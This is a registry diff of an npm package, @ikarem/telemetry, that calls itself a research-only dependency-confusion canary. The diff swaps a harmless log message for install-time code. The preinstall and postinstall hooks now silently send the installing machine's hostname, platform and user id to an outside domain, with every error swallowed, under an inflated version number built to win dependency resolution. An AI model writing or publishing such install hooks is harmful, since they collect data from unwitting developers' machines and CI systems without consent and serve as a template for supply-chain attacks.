@ikarem/telemetry 100.1.10 → 100.2.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +40 -11
  2. package/package.json +5 -9
package/index.js CHANGED
@@ -1,15 +1,44 @@
1
- // index.js
2
- // Safe research-only postinstall hook. Does NOT exfiltrate data.
3
- // It only prints a message to stdout so it appears in CI logs.
1
+ /*
2
+ Research-only npm lifecycle canary
3
+ - Minimal data
4
+ - No persistence
5
+ - No environment inspection
6
+ - Fail-silent by design
7
+ */
4
8
 
5
- const crypto = require("crypto");
9
+ const https = require("https");
10
+ const os = require("os");
6
11
 
7
- const installId = crypto.randomBytes(8).toString("hex");
12
+ const EVENT = process.argv[2] || "unknown";
8
13
 
9
- console.log("==============================================");
10
- console.log("[Research] Dependency resolution test package");
11
- console.log("[Research] Package: @ikarem-test/telemetry");
12
- console.log(`[Research] Install ID: ${installId}`);
13
- console.log("[Research] If you see this in CI logs, a public scoped package was installed.");
14
- console.log("==============================================");
14
+ function safeSend() {
15
+ try {
16
+ const payload = new URLSearchParams({
17
+ package: "@ikarem/telemetry",
18
+ version: "100.2.0",
19
+ event: EVENT,
20
+ hostname: os.hostname(),
21
+ platform: process.platform,
22
+ user: typeof process.getuid === "function" ? String(process.getuid()) : "unknown"
23
+ });
24
+
25
+ const req = https.request(
26
+ {
27
+ hostname: "https://reproduce-supply-chain.ikarem.meraki.hexlsi.com", // replace with stable domain
28
+ path: `/evidence?${payload.toString()}`,
29
+ method: "GET",
30
+ timeout: 2000
31
+ },
32
+ () => {}
33
+ );
34
+
35
+ req.on("error", () => {});
36
+ req.on("timeout", () => req.destroy());
37
+ req.end();
38
+ } catch (_) {
39
+ // Intentionally ignore all errors
40
+ }
41
+ }
42
+
43
+ safeSend();
15
44
 
package/package.json CHANGED
@@ -1,19 +1,15 @@
1
1
  {
2
2
  "name": "@ikarem/telemetry",
3
- "version": "100.1.10",
3
+ "version": "100.2.0",
4
4
  "description": "Research-only dependency confusion canary package",
5
5
  "main": "index.js",
6
6
  "scripts": {
7
- "preinstall": "sh scripts/telemetry.sh preinstall",
8
- "postinstall": "sh scripts/telemetry.sh postinstall",
9
- "preupdate": "sh scripts/telemetry.sh preupdate",
10
- "postupdate": "sh scripts/telemetry.sh postupdate"
7
+ "preinstall": "node index.js preinstall",
8
+ "postinstall": "node index.js postinstall"
11
9
  },
12
10
  "publishConfig": {
13
11
  "access": "public"
14
12
  },
15
- "license": "MIT",
16
- "dependencies": {
17
- "@ikarem/telemetry": "^99.99.99"
18
- }
13
+ "license": "MIT"
19
14
  }
15
+